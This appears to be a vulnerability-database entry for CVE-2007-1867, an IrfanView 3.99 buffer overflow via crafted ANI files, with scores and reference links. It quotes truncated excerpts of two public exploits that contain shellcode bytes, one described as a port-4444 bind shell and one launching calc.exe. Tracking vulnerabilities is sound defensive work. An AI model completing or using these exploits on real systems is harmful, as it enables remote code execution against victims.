CVE-2007-1867
published 2007-04-04CVE-2007-1867: Buffer overflow in IrfanView 3.99 allows remote attackers to execute arbitrary code via a crafted animated cursor (ANI) file.
PriorityP344critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
7.91%
94.0th percentile
Buffer overflow in IrfanView 3.99 allows remote attackers to execute arbitrary code via a crafted animated cursor (ANI) file.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| irfanview | irfanview | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
IrfanView 3.99 - '.ani' Local Buffer Overflow (2)
exploitdb·2007-04-09
CVE-2007-1867 IrfanView 3.99 - '.ani' Local Buffer Overflow (2)
IrfanView 3.99 - '.ani' Local Buffer Overflow (2)
---
/*
IrfanView 3.99 .ANI File Buffer Overflow (Multiple Targets and port bind shell)
Old Target:
Windows XP Sp2 FR
New targets:
Windows XP SP2 Portuguese Call ESP Addr
Windows XP SP2 English Call ESP Addr
Greetz: Ricardo Fiorelli, Marsu (make this possible.. nice job!), Str0ke , Sekure.org guys!
*/
#include
#include
/* win32_exec - EXITFUNC=process Bind TCP port 4444 http://metasploit.com */
char BindShellcode[]=
"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c"
"\x24\x24\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b"
"\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01"
"\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f"
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb"
"\x03\x2c\x8b\x8
Exploit-DB
IrfanView 3.99 - '.ani' Local Buffer Overflow (1)
exploitdb·2007-04-02
CVE-2007-1867 IrfanView 3.99 - '.ani' Local Buffer Overflow (1)
IrfanView 3.99 - '.ani' Local Buffer Overflow (1)
---
/***************************************************************************
* IrfanView 3.99 .ANI File Buffer Overflow *
* *
* *
* IrfanView is vulnerable to a buffer overflow when opening a crafted .ani *
* file. The overflow occurs while it is creating a snapshot of the file. *
* This exploit launches calc.exe. *
* *
* Tested against Win XP SP2 FR. *
* Have Fun! *
* *
* Coded and discovered by Marsu *
* *
* Note: this has nothing in common with the LoadAniIcon Stack Overflow. *
***************************************************************************/
#include "stdio.h"
#include "stdlib.h"
/* win32_exec - EXITFUNC=process CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com */
unsigned char CalcShellcode[] =
"\x29\
No writeups or analysis indexed.
http://secunia.com/advisories/24725http://www.securityfocus.com/bid/23262http://www.vupen.com/english/advisories/2007/1210https://exchange.xforce.ibmcloud.com/vulnerabilities/33386https://www.exploit-db.com/exploits/3648http://secunia.com/advisories/24725http://www.securityfocus.com/bid/23262http://www.vupen.com/english/advisories/2007/1210https://exchange.xforce.ibmcloud.com/vulnerabilities/33386https://www.exploit-db.com/exploits/3648
2007-04-04
Published